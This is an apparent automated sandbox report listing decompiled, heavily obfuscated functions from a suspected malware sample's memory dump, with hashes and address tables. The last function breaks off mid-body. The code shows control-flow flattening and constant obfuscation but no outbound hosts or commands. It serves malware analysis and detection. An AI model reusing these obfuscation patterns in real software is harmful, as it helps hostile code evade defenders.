Opcode Fuzzy Hash: 70d39a78e3ab786549318ccb702bdfc1bcc7dde35113822f4650e37c684f7d3d
Instruction Fuzzy Hash: 2751F372D01309EBEF08CFE1C94A9DEBBB2FB04314F208159D511B62A0D7B96A55DF94

Uniqueness

Uniqueness Score: -1.00%

Function 002573AC, Relevance: 4.0, Strings: 3, Instructions: 219
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E002573AC() {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _t194;
				intOrPtr _t196;
				intOrPtr _t199;
				intOrPtr _t202;
				intOrPtr _t204;
				intOrPtr _t205;
				signed int _t207;
				signed int _t208;
				signed int _t209;
				signed int _t210;
				void* _t238;
				char _t242;
				signed int* _t243;
				void* _t245;

				_t243 =  &_v108;
				_v24 = 0x44d5d8;
				_t205 = 0;
				_v20 = 0;
				_v40 = 0x23cf;
				_v40 = _v40 ^ 0xbe38916f;
				_v40 = _v40 ^ 0xbe38820d;
				_v108 = 0x2e00;
				_v108 = _v108 + 0xe6b6;
				_v108 = _v108 * 0x5d;
				_t238 = 0x219f160f;
				_t207 = 0xe;
				_v108 = _v108 / _t207;
				_v108 = _v108 ^ 0x000708e5;
				_v56 = 0xac50;
				_t208 = 0x74;
				_v56 = _v56 / _t208;
				_v56 = _v56 ^ 0x00005612;
				_v48 = 0xf915;
				_v48 = _v48 + 0xc201;
				_v48 = _v48 ^ 0x0001bde6;
				_v76 = 0xa4d1;
				_v76 = _v76 << 0xb;
				_v76 = _v76 + 0x2090;
				_v76 = _v76 ^ 0x0526efdc;
				_v104 = 0x1331;
				_v104 = _v104 ^ 0x9278d736;
				_v104 = _v104 << 0xf;
				_v104 = _v104 << 3;
				_v104 = _v104 ^ 0x101c0c8f;
				_v52 = 0x4912;
				_t209 = 0x53;
				_v52 = _v52 * 0x5f;
				_v52 = _v52 ^ 0x001b11ba;
				_v80 = 0x36f7;
				_v80 = _v80 | 0x0c78674c;
				_v80 = _v80 + 0xffff3df1;
				_v80 = _v80 ^ 0x0c77a943;
				_v84 = 0x9f3a;
				_v84 = _v84 << 8;
				_v84 = _v84 ^ 0x7966a269;
				_v84 = _v84 ^ 0x79f9b7a1;
				_v60 = 0xac57;
				_v60 = _v60 ^ 0x3fa2bf2a;
				_v60 = _v60 ^ 0x3fa276dc;
				_v88 = 0xe218;
				_v88 = _v88 | 0xea5468c5;
				_v88 = _v88 << 0x10;
				_v88 = _v88 ^ 0xeadd1cb3;
				_v64 = 0x6c6b;
				_v64 = _v64 + 0xffff53e7;
				_v64 = _v64 ^ 0xffffd13f;
				_v92 = 0x6a88;
				_v92 = _v92 >> 1;
				_v92 = _v92 ^ 0xe005aace;
				_v92 = _v92 ^ 0xe005a166;
				_v100 = 0xd6b9;
				_v100 = _v100 ^ 0x5f91bbd5;
				_v100 = _v100 ^ 0x5ce69075;
				_v100 = _v100 >> 0xf;
				_v100 = _v100 ^ 0x00003faf;
				_v44 = 0xc8e7;
				_v44 = _v44 / _t209;
				_v44 = _v44 ^ 0x00005627;
				_v72 = 0xdbaa;
				_t210 = 0x49;
				_v72 = _v72 / _t210;
				_v72 = _v72 | 0xff4e0ba5;
				_v72 = _v72 ^ 0xff4e47cb;
				_v68 = 0x962f;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 << 4;
				_v68 = _v68 ^ 0x00006f62;
				_v96 = 0xef5c;
				_t211 = 0x44;
				_v96 = _v96 * 0x25;
				_v96 = _v96 / _t211;
				_v96 = _v96 << 1;
				_v96 = _v96 ^ 0x0001262b;
				_t237 = _v36;
				_t242 = _v36;
				goto L1;
				do {
					while(1) {
						L1:
						_t245 = _t238 - 0x219f160f;
						if(_t245 > 0) {
							break;
						}
						if(_t245 == 0) {
							_t238 = 0x2394b362;
							continue;
						}
						if(_t238 == 0x8b9146f) {
							E00259465(_v68, _t237, _v96);
							L23:
							return _t205;
						}
						if(_t238 == 0x93670d9) {
							_t194 = E0025340A(_v80,  &_v32, _v84,  &_v16);
							asm("sbb esi, esi");
							_pop(_t211);
							_t238 = ( ~_t194 & 0xf6f92468) + 0x24090f6a;
							continue;
						}
						if(_t238 == 0x155b4458) {
							_t196 = E002589D3(_t242, _v108,  &_v36, _v56);
							_t237 = _t196;
							_pop(_t211);
							if(_t196 == 0) {
								goto L23;
							}
							_t238 = 0x35a1dc77;
							continue;
						}
						if(_t238 != 0x1b0233d2) {
							goto L20;
						} else {
							_t199 =  *0x25ca2c; // 0x6d8300
							E00256128(_v60, _v88, _v12, _t199 + 0x230, _v64, _v92, _v8 + 1);
							_t202 =  *0x25ca2c; // 0x6d8300
							_t211 = _v16;
							_t243 =  &(_t243[5]);
							_t205 = 1;
							_t238 = 0x24090f6a;
							 *(_t202 + 0x450) = _v16;
							continue;
						}
					}
					if(_t238 == 0x2394b362) {
						_t242 = E0024F4D0(_t211);
						_t238 = 0x155b4458;
						goto L20;
					}
					if(_t238 == 0x24090f6a) {
						E0024F536(_v100, _v44, _v72, _v32);
						_pop(_t211);
						_t238 = 0x8b9146f;
						goto L1;
					}
					if(_t238 != 0x35a1dc77) {
						goto L20;
					}
					_t238 = 0x8b9146f;
					if(_v36 > 2) {
						_t211 = _v48;
						_t204 = E0024EA4C( *((intOrPtr*)(_t237 + 8)), _v76, _v104,  &_v28, _v52);
						_t243 =  &(_t243[4]);
						_v32 = _t204;
						if(_t204 != 0) {
							_t238 = 0x93670d9;
						}
					}
					goto L1;
					L20:
				} while (_t238 != 0x36620d3);
				goto L23;
			}

0x002573ac
0x002573af
0x002573ba
0x002573bc
0x002573c0
0x002573c8
0x002573d0
0x002573d8
0x002573e0
0x002573f2
0x002573f6
0x002573ff
0x00257404
0x0025740a
0x00257412
0x0025741e
0x00257423
0x00257429
0x00257431
0x00257439
0x00257441
0x00257449
0x00257451
0x00257456
0x0025745e
0x00257466
0x0025746e
0x00257476
0x0025747b
0x00257480
0x00257488
0x00257495
0x00257496
0x0025749a
0x002574a2
0x002574aa
0x002574b2
0x002574ba
0x002574c2
0x002574ca
0x002574cf
0x002574d7
0x002574df
0x002574e7
0x002574ef
0x002574f7
0x002574ff
0x00257507
0x0025750c
0x00257514
0x0025751c
0x00257524
0x0025752c
0x00257534
0x00257538
0x00257540
0x00257548
0x00257550
0x00257558
0x00257560
0x00257565
0x0025756d
0x0025757b
0x0025757f
0x00257587
0x00257597
0x0025759c
0x002575a2
0x002575aa
0x002575b2
0x002575ba
0x002575bf
0x002575c4
0x002575cc
0x002575d9
0x002575da
0x002575e4
0x002575e8
0x002575ec
0x002575f4
0x002575f8
0x002575f8
0x002575fc
0x002575fc
0x002575fc
0x002575fc
0x00257602
0x00000000
0x00000000
0x00257608
0x002576e2
0x00000000
0x002576e2
0x00257614
0x00257793
0x0025779c
0x002577a2
0x002577a2
0x00257620
0x002576c4
0x002576ce
0x002576d6
0x002576d7
0x00000000
0x002576d7
0x0025762c
0x00257698
0x0025769d
0x002576a0
0x002576a3
0x00000000
0x00000000
0x002576a9
0x00000000
0x002576a9
0x00257634
0x00000000
0x0025763a
0x00257648
0x00257662
0x00257667
0x0025766e
0x00257675
0x00257678
0x00257679
0x0025767e
0x00000000
0x0025767e
0x00257634
0x002576f2
0x00257774
0x00257776
0x00000000
0x00257776
0x002576fa
0x0025775a
0x00257760
0x00257761
0x00000000
0x00257761
0x00257702
0x00000000
0x00000000
0x00257709
0x0025770e
0x00257728
0x0025772c
0x00257731
0x00257734
0x0025773a
0x00257740
0x00257740
0x0025773a
0x00000000
0x0025777b
0x0025777b
0x00000000

Strings

bo, xrefs: 002575C4
\, xrefs: 002575CC
'V, xrefs: 0025757F

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: 'V$\$bo
API String ID: 0-4178943049
Opcode ID: 790a2b9a0549bffce08f638b39bebf1817f0296ec78bce62a8b639c9421d8816
Instruction ID: da8fa5d28774e62d44a97de4ea451242f3033aca1ebc97a85984d97427247034
Opcode Fuzzy Hash: 790a2b9a0549bffce08f638b39bebf1817f0296ec78bce62a8b639c9421d8816
Instruction Fuzzy Hash: 20A1627251C3428FD358CF28D48940BFBF1FBC4758F50892DF99996260D7B58A588F8A

Uniqueness

Uniqueness Score: -1.00%

Function 002496CD, Relevance: 3.9, Strings: 3, Instructions: 191
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E002496CD(signed int* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8) {
				char _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				unsigned int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				unsigned int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				void* _t162;
				signed int _t179;
				void* _t192;
				signed int _t193;
				signed int _t194;
				signed int _t195;
				signed int _t196;
				signed int _t197;
				void* _t200;
				intOrPtr* _t222;
				signed int* _t223;
				signed int* _t226;

				_push(_a8);
				_t222 = _a4;
				_t223 = __ecx;
				_push(_t222);
				_push(__ecx);
				E0024602B(_t162);
				_v80 = 0xadf4;
				_t226 =  &(( &_v140)[4]);
				_t200 = 0xade8ac2;
				_t193 = 0x38;
				_v80 = _v80 / _t193;
				_v80 = _v80 ^ 0x00005e4d;
				_v88 = 0xd682;
				_v88 = _v88 ^ 0xf51d39be;
				_v88 = _v88 ^ 0xf51dab09;
				_v96 = 0x72b2;
				_v96 = _v96 ^ 0xfa4c809d;
				_v96 = _v96 ^ 0xfa4c99cb;
				_v116 = 0x90ca;
				_v116 = _v116 | 0x91d06c09;
				_v116 = _v116 ^ 0x5d2d7dc0;
				_v116 = _v116 ^ 0xccfdf140;
				_v124 = 0x94f4;
				_v124 = _v124 >> 9;
				_t194 = 0x7e;
				_v124 = _v124 / _t194;
				_v124 = _v124 >> 1;
				_v124 = _v124 ^ 0x00005a93;
				_v92 = 0xb2da;
				_v92 = _v92 >> 0xf;
				_v92 = _v92 ^ 0x00004526;
				_v132 = 0xfe39;
				_v132 = _v132 ^ 0x94a2bb32;
				_v132 = _v132 + 0xffff197d;
				_v132 = _v132 + 0xa385;
				_v132 = _v132 ^ 0x94a23d21;
				_v104 = 0xe4d2;
				_v104 = _v104 ^ 0x49cfaa80;
				_v104 = _v104 | 0x48b9e868;
				_v104 = _v104 ^ 0x49ffe136;
				_v112 = 0xb598;
				_v112 = _v112 ^ 0x0d96fbe5;
				_v112 = _v112 + 0x88b9;
				_v112 = _v112 ^ 0x0d96d484;
				_v136 = 0x3e03;
				_v136 = _v136 ^ 0x29ac334c;
				_v136 = _v136 >> 9;
				_v136 = _v136 << 8;
				_v136 = _v136 ^ 0x14d602a1;
				_v120 = 0xd3c3;
				_t195 = 0x26;
				_v120 = _v120 / _t195;
				_t196 = 0x3e;
				_v120 = _v120 * 0x17;
				_v120 = _v120 ^ 0x0000f1c0;
				_v140 = 0x72b1;
				_v140 = _v140 + 0xffffab40;
				_v140 = _v140 << 0xe;
				_v140 = _v140 / _t196;
				_v140 = _v140 ^ 0x001e8f72;
				_v128 = 0x9994;
				_v128 = _v128 + 0xffff8c6c;
				_v128 = _v128 + 0xa4f6;
				_t197 = 0x3d;
				_v128 = _v128 / _t197;
				_v128 = _v128 ^ 0x00001242;
				_v100 = 0x8258;
				_v100 = _v100 + 0xffff85b7;
				_v100 = _v100 * 0x51;
				_v100 = _v100 ^ 0x000280a1;
				_v84 = 0x5c44;
				_v84 = _v84 ^ 0x1285eccb;
				_v84 = _v84 ^ 0x12858e57;
				_v108 = 0x7f88;
				_v108 = _v108 | 0x4d438ffe;
				_v108 = _v108 + 0xffff02b4;
				_v108 = _v108 ^ 0x4d436acf;
				do {
					while(_t200 != 0xade8ac2) {
						if(_t200 == 0xeed9730) {
							_push(_t200);
							_push(_t200);
							_t179 = E00248736(_t223[1]);
							 *_t223 = _t179;
							__eflags = _t179;
							if(__eflags != 0) {
								_t200 = 0x173d5c4e;
								continue;
							}
						} else {
							if(_t200 == 0xffe2862) {
								E0025360F( &_v76, _v120, _v140,  *_t222, _v128);
								_t226 =  &(_t226[3]);
								_t200 = 0x220c9c88;
								continue;
							} else {
								if(_t200 == 0x173d5c4e) {
									E002550F2( &_v76, _v104, _v112, _v136, _t223);
									_t226 =  &(_t226[3]);
									_t200 = 0xffe2862;
									continue;
								} else {
									if(_t200 == 0x220c9c88) {
										E00247998(_v100, _v84, __eflags, _t222 + 4,  &_v76, _v108);
									} else {
										if(_t200 != 0x2d9f638c) {
											goto L13;
										} else {
											_t207 = _t222;
											_t223[1] = E00257A0F(_t222);
											_t192 = E002478A5(_t222, _t207, 0x1000, _t207, 0x400);
											_t226 =  &(_t226[4]);
											_t200 = 0xeed9730;
											_t223[1] = _t223[1] + _t192;
											continue;
										}
									}
								}
							}
						}
						L16:
						__eflags =  *_t223;
						_t161 =  *_t223 != 0;
						__eflags = _t161;
						return 0 | _t161;
					}
					 *_t223 = 0;
					_t200 = 0x2d9f638c;
					_t223[1] = 0;
					L13:
					__eflags = _t200 - 0x18ac994b;
				} while (__eflags != 0);
				goto L16;
			}

0x002496d7
0x002496de
0x002496e5
0x002496e7
0x002496e9
0x002496ea
0x002496ef
0x002496f7
0x00249700
0x00249707
0x0024970c
0x00249712
0x0024971a
0x00249722
0x0024972a
0x00249732
0x0024973a
0x00249742
0x0024974a
0x00249752
0x0024975a
0x00249762
0x0024976a
0x00249772
0x0024977b
0x00249780
0x00249786
0x0024978a
0x00249792
0x0024979a
0x0024979f
0x002497a7
0x002497af
0x002497b7
0x002497bf
0x002497c7
0x002497cf
0x002497d7
0x002497df
0x002497e7
0x002497ef
0x002497f7
0x002497ff
0x00249807
0x0024980f
0x00249817
0x0024981f
0x00249824
0x00249829
0x00249831
0x0024983d
0x00249842
0x0024984d
0x0024984e
0x00249852
0x0024985a
0x00249862
0x0024986a
0x00249875
0x00249879
0x00249883
0x00249890
0x00249898
0x002498a6
0x002498a9
0x002498ad
0x002498b5
0x002498bd
0x002498ca
0x002498ce
0x002498d6
0x002498de
0x002498e6
0x002498ee
0x002498f6
0x002498fe
0x00249906
0x00249910
0x00249910
0x00249922
0x002499d7
0x002499d8
0x002499dc
0x002499e1
0x002499e5
0x002499e7
0x002499e9
0x00000000
0x002499e9
0x00249928
0x0024992e
0x002499b9
0x002499be
0x002499c1
0x00000000
0x00249930
0x00249932
0x00249995
0x0024999a
0x0024999d
0x00000000
0x00249934
0x0024993a
0x00249a1d
0x00249940
0x00249946
0x00000000
0x0024994c
0x0024994c
0x00249953
0x00249972
0x00249977
0x0024997a
0x0024997f
0x00000000
0x0024997f
0x00249946
0x0024993a
0x00249932
0x0024992e
0x00249a26
0x00249a28
0x00249a2c
0x00249a2c
0x00249a36
0x00249a36
0x002499f0
0x002499f2
0x002499f7
0x002499fa
0x002499fa
0x002499fa
0x00000000

Strings

M^, xrefs: 00249712
&E, xrefs: 0024979F
D\, xrefs: 002498D6

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: &E$D\$M^
API String ID: 0-182273106
Opcode ID: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
Instruction ID: d6dbcc5dbf522340502100a5265d4b12de04b34cf2e09851cef04fd84bb33497
Opcode Fuzzy Hash: 7e73a032ed4c88d170dab7654c0d89932568e0a188c774ecf291dec26883a179
Instruction Fuzzy Hash: F48164715183819FE358CF25C88A81BBBE0BFD8354F50891CF196862A0D3B68A99CF46

Uniqueness

Uniqueness Score: -1.00%

Function 0024153C, Relevance: 3.9, Strings: 3, Instructions: 131
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0024153C() {
				char _v520;
				signed int _v524;
				signed int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				signed int _v556;
				signed int _v560;
				signed int _t116;
				void* _t117;
				void* _t119;
				signed int _t122;
				signed int _t134;
				void* _t136;
				signed int _t137;
				signed int* _t138;

				_t138 =  &_v560;
				_v528 = 0xa2e9;
				_v528 = _v528 + 0xfffffe64;
				_t119 = 0x3a74a7f9;
				_v528 = _v528 ^ 0x0000e8bc;
				_v532 = 0xc148;
				_v532 = _v532 + 0x228e;
				_v532 = _v532 ^ 0x0000dc63;
				_v548 = 0x43c;
				_v548 = _v548 + 0xffff6922;
				_v548 = _v548 | 0xfd2a2fe1;
				_v548 = _v548 ^ 0xb6db9be5;
				_v548 = _v548 ^ 0x4924f3d5;
				_v544 = 0x1b71;
				_v544 = _v544 ^ 0xba1667e6;
				_v544 = _v544 >> 2;
				_v544 = _v544 << 7;
				_v544 = _v544 ^ 0x42cfc722;
				_v540 = 0x29dd;
				_v540 = _v540 + 0xa2;
				_v540 = _v540 ^ 0xc29808bd;
				_v540 = _v540 + 0xffff2b53;
				_v540 = _v540 ^ 0xc2975a13;
				_v556 = 0x7857;
				_v556 = _v556 ^ 0xa059c8e7;
				_v556 = _v556 << 9;
				_v556 = _v556 << 4;
				_v556 = _v556 ^ 0x361613d4;
				_v560 = 0x6ef2;
				_v560 = _v560 ^ 0x7dc12174;
				_v560 = _v560 * 0x52;
				_t136 = 0;
				_v560 = _v560 ^ 0x47eb388f;
				_v536 = 0x33fe;
				_v536 = _v536 + 0x28fb;
				_v536 = _v536 ^ 0x000029c0;
				_v552 = 0x40f6;
				_v552 = _v552 | 0x9b4debbc;
				_v552 = _v552 + 0x1ce1;
				_t134 = 0x7e;
				_t137 = _v536;
				_t135 = _v536;
				_v552 = _v552 / _t134;
				_v552 = _v552 ^ 0x013b83e5;
				_v524 = 0xe5bd;
				_v524 = _v524 ^ 0x97a1ef4c;
				_v524 = _v524 ^ 0x97a11b87;
				do {
					while(_t119 != 0x6cc9294) {
						if(_t119 == 0xcd96d8e) {
							_v560 = 0x65f6;
							_t122 = 0x33;
							_v560 = _v560 / _t122;
							_v560 = _v560 + 0xffffea35;
							_v560 = _v560 ^ 0xd5d8ecd6;
							_t136 =  ==  ? 1 : _t136;
						} else {
							if(_t119 == 0x11374e9c) {
								E0024E29C(_v552, _v524, _t137);
								_t119 = 0xcd96d8e;
								continue;
							} else {
								if(_t119 == 0x31a842b3) {
									_t116 = E00248697();
									_t135 = _t116;
									if(_t116 != 0) {
										_t119 = 0x34255e69;
										continue;
									}
								} else {
									if(_t119 == 0x34255e69) {
										_t117 = E002460B9( &_v520, _v548, _v544, _t119, _v540, _t135, _v556);
										_t138 =  &(_t138[5]);
										if(_t117 != 0) {
											_t119 = 0x6cc9294;
											continue;
										}
									} else {
										if(_t119 != 0x3a74a7f9) {
											goto L14;
										} else {
											_t119 = 0x31a842b3;
											continue;
										}
									}
								}
							}
						}
						L17:
						return _t136;
					}
					_t137 = E002428CE( &_v520, _v560, _v536);
					_t119 = 0x11374e9c;
					L14:
				} while (_t119 != 0x55f7722);
				goto L17;
			}

0x0024153c
0x00241546
0x00241550
0x00241558
0x0024155d
0x00241565
0x0024156d
0x00241575
0x0024157d
0x00241585
0x0024158d
0x00241595
0x0024159d
0x002415a5
0x002415ad
0x002415b5
0x002415ba
0x002415bf
0x002415c7
0x002415cf
0x002415d7
0x002415df
0x002415e7
0x002415ef
0x002415f7
0x002415ff
0x00241604
0x00241609
0x00241611
0x00241619
0x00241626
0x0024162a
0x0024162c
0x00241634
0x0024163c
0x00241644
0x0024164c
0x00241654
0x0024165c
0x0024166a
0x0024166d
0x00241675
0x00241679
0x0024167d
0x00241685
0x0024168d
0x00241695
0x0024169d
0x0024169d
0x002416af
0x0024176c
0x0024177c
0x0024177f
0x00241785
0x0024178e
0x0024179c
0x002416b5
0x002416bb
0x00241733
0x0024173b
0x00000000
0x002416bd
0x002416c3
0x00241715
0x0024171a
0x0024171e
0x00241720
0x00000000
0x00241720
0x002416c5
0x002416cb
0x002416f6
0x002416fb
0x00241700
0x00241706
0x00000000
0x00241706
0x002416cd
0x002416d3
0x00000000
0x002416d9
0x002416d9
0x00000000
0x002416d9
0x002416d3
0x002416cb
0x002416c3
0x002416bb
0x002417a0
0x002417ab
0x002417ab
0x00241757
0x00241759
0x0024175e
0x0024175e
0x00000000

Strings

Wx, xrefs: 002415EF
i^%4, xrefs: 00241720
i^%4, xrefs: 002416C5

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: Wx$i^%4$i^%4
API String ID: 0-1584002782
Opcode ID: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
Instruction ID: 9a6875bd73089534b8259cdbf487806d3e6412b84cbdb8d1b73936a09bb66d23
Opcode Fuzzy Hash: 27d29786511c872af26309c852dc0a5908d1aeb1159e12b99986ab535e94628a
Instruction Fuzzy Hash: 2D5158711183428FD398CE25C58942BFBE1BBC4758F140E1DF49A962A0D7B4CA69CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00257D03, Relevance: 3.9, Strings: 3, Instructions: 127
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00257D03() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _t105;
				intOrPtr _t112;
				signed int _t114;
				signed int _t115;
				signed int _t116;
				intOrPtr _t117;
				void* _t119;
				void* _t129;
				signed int* _t131;

				_t131 =  &_v44;
				_v8 = 0x68fc;
				_v8 = _v8 + 0xbb36;
				_v8 = _v8 ^ 0x000162e9;
				_v44 = 0xabcf;
				_t114 = 0x5a;
				_v44 = _v44 / _t114;
				_v44 = _v44 << 5;
				_t129 = 0x1aabdcf3;
				_v44 = _v44 ^ 0x41a75d37;
				_v44 = _v44 ^ 0x41a744f3;
				_v12 = 0xa837;
				_v12 = _v12 + 0xbdd3;
				_v12 = _v12 ^ 0x0001592e;
				_v36 = 0x1a64;
				_v36 = _v36 + 0x1ecf;
				_v36 = _v36 | 0x383b765c;
				_v36 = _v36 ^ 0x383b27b5;
				_v40 = 0x1cb7;
				_v40 = _v40 | 0xfad83379;
				_t115 = 0x73;
				_v40 = _v40 / _t115;
				_v40 = _v40 ^ 0x022e74ac;
				_v16 = 0x5673;
				_v16 = _v16 << 4;
				_v16 = _v16 ^ 0x00050551;
				_v20 = 0x8ddb;
				_v20 = _v20 + 0xffffc9bf;
				_t116 = 0x22;
				_v20 = _v20 * 0x54;
				_v20 = _v20 ^ 0x001c9060;
				_v24 = 0x24b0;
				_v24 = _v24 ^ 0x7eaabc9b;
				_v24 = _v24 ^ 0x558f972f;
				_v24 = _v24 ^ 0x2b251b7e;
				_v28 = 0xbf97;
				_v28 = _v28 + 0xffff41a2;
				_v28 = _v28 * 0x14;
				_v28 = _v28 ^ 0x00001fe8;
				_v32 = 0x3a57;
				_v32 = _v32 << 3;
				_v32 = _v32 ^ 0x30418ed0;
				_v32 = _v32 ^ 0x30407688;
				_v4 = 0xf5c8;
				_v4 = _v4 / _t116;
				_v4 = _v4 ^ 0x00000add;
				_t117 =  *0x25ca30; // 0x0
				do {
					while(_t129 != 0x15241428) {
						if(_t129 == 0x1aabdcf3) {
							_push(_t117);
							_push(_t117);
							_t119 = 0x2c;
							_t117 = E00248736(_t119);
							 *0x25ca30 = _t117;
							if(_t117 != 0) {
								_t129 = 0x337355f8;
								continue;
							}
						} else {
							if(_t129 != 0x337355f8) {
								goto L8;
							} else {
								_push(_t117);
								_t112 = E002459D5(_t117, _v36, _t117, _v40, _v16);
								_t117 =  *0x25ca30; // 0x0
								_t131 =  &(_t131[5]);
								_t129 = 0x15241428;
								 *((intOrPtr*)(_t117 + 8)) = _t112;
								continue;
							}
						}
						goto L9;
					}
					_push(_t117);
					_t105 = E00241132(_v20, _t117, _v24, _t117, 0, _v28, _v32, _v4, E0024E377);
					_t117 =  *0x25ca30; // 0x0
					_t131 =  &(_t131[9]);
					_t129 = 0x3afebe4c;
					 *((intOrPtr*)(_t117 + 0x18)) = _t105;
					L8:
				} while (_t129 != 0x3afebe4c);
				L9:
				return 0 | _t117 != 0x00000000;
			}

0x00257d03
0x00257d06
0x00257d10
0x00257d18
0x00257d20
0x00257d30
0x00257d35
0x00257d3b
0x00257d40
0x00257d45
0x00257d52
0x00257d5f
0x00257d6c
0x00257d74
0x00257d7c
0x00257d84
0x00257d8c
0x00257d94
0x00257d9c
0x00257da4
0x00257db0
0x00257db5
0x00257dbb
0x00257dc3
0x00257dcb
0x00257dd0
0x00257dd8
0x00257de0
0x00257ded
0x00257dee
0x00257df2
0x00257dfa
0x00257e02
0x00257e0a
0x00257e12
0x00257e1a
0x00257e22
0x00257e2f
0x00257e33
0x00257e3b
0x00257e43
0x00257e48
0x00257e50
0x00257e58
0x00257e66
0x00257e6a
0x00257e72
0x00257e78
0x00257e78
0x00257e82
0x00257eb7
0x00257eb8
0x00257ebb
0x00257ec3
0x00257ec5
0x00257ecd
0x00257ecf
0x00000000
0x00257ecf
0x00257e84
0x00257e86
0x00000000
0x00257e88
0x00257e88
0x00257e96
0x00257e9b
0x00257ea1
0x00257ea4
0x00257ea6
0x00000000
0x00257ea6
0x00257e86
0x00000000
0x00257e82
0x00257ed3
0x00257ef1
0x00257ef6
0x00257efc
0x00257eff
0x00257f01
0x00257f04
0x00257f04
0x00257f0d
0x00257f1a

Strings

sV, xrefs: 00257DC3
W:, xrefs: 00257E3B
\v;8, xrefs: 00257D8C

Memory Dump Source

Source File: 00000007.00000002.2100502394.0000000000241000.00000020.00000001.sdmp, Offset: 00240000, based on PE: true

Associated: 00000007.00000002.2100489836.0000000000240000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100590212.000000000025C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: W:$\v;8$sV
API String ID: 0-492820393
Opcode ID: 41b53c6db3fc11f71e6c57dff9efc5016e8c3da1e159a84caa20216cc7a41fb4
Instruction ID: d277c9e27301c3ebf70812b278307b9f8260fae068e2d51ed1a08e596b26d810
Opcode Fuzzy Hash: 41b53c6db3fc11f71e6c57dff9efc5016e8c3da1e159a84caa20216cc7a41fb4
Instruction Fuzzy Hash: F551AA711183419FD348CF25D88A81FBBE1FB88758F500A1DF486962A0D3B5DA59CF8B

Uniqueness

Uniqueness Score: -1.00%

Function 0024E05A, Relevance: 3.9, Strings: 3, Instructions: 126
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0024E05A(void* __ecx, void* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed short _v40;
				signed int _v44;
				signed int _v48;
				signed int _t107;
				signed short _t113;
				signed short _t116;
				signed short _t118;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				signed int _t123;
				intOrPtr _t124;
				signed short _t128;
				signed short* _t143;
				signed short _t145;
				void* _t146;
				signed int* _t147;

				_t147 =  &_v48;
				_v16 = 0x6d293b;
				_v12 = 0x468ef5;
				_v8 = 0;
				_v4 = 0;
				_t146 = __ecx;
				_v40 = 0x7b4e;
				_v40 = _v40 + 0xffff3b83;
				_v40 = _v40 + 0xffffa7a8;
				_v40 = _v40 ^ 0xffff5e78;
				_v20 = 0xb6a1;
				_t120 = 0x38;
				_v20 = _v20 / _t120;
				_v20 = _v20 ^ 0x00007f71;
				_v44 = 0x997f;
				_v44 = _v44 ^ 0xba9196e9;
				_v44 = _v44 ^ 0x66374254;
				_t26 =  &_v44; // 0x66374254
				_t121 = 0xe;
				_v44 =  *_t26 / _t121;
				_v44 = _v44 ^ 0x0fc29c0d;
				_v48 = 0x4c26;
				_v48 = _v48 | 0xfd76fef6;
				_v48 = _v48 >> 3;
				_v48 = _v48 ^ 0x1faed217;
				_v24 = 0xc5b2;
				_t122 = 0x42;
				_v24 = _v24 * 0x67;
				_v24 = _v24 << 9;
				_v24 = _v24 ^ 0x9f1566f7;
				_v28 = 0x55d;
				_v28 = _v28 << 0xb;
				_v28 = _v28 / _t122;
				_v28 = _v28 ^ 0x0000f55e;
				_v32 = 0x8f6f;
				_t123 = 6;
				_v32 = _v32 * 0x4f;
				_v32 = _v32 + 0xffffe8fc;
				_v32 = _v32 ^ 0x002c0f4c;
				_v36 = 0xd672;
				_v36 = _v36 / _t123;
				_v36 = _v36 + 0xffffc0a7;
				_v36 = _v36 ^ 0xffffa997;
				_t107 = _v40;
				_t124 =  *((intOrPtr*)(__edx + 0x78 + _t107 * 8));
				if(_t124 == 0 ||  *((intOrPtr*)(__edx + 0x7c + _t107 * 8)) == 0) {
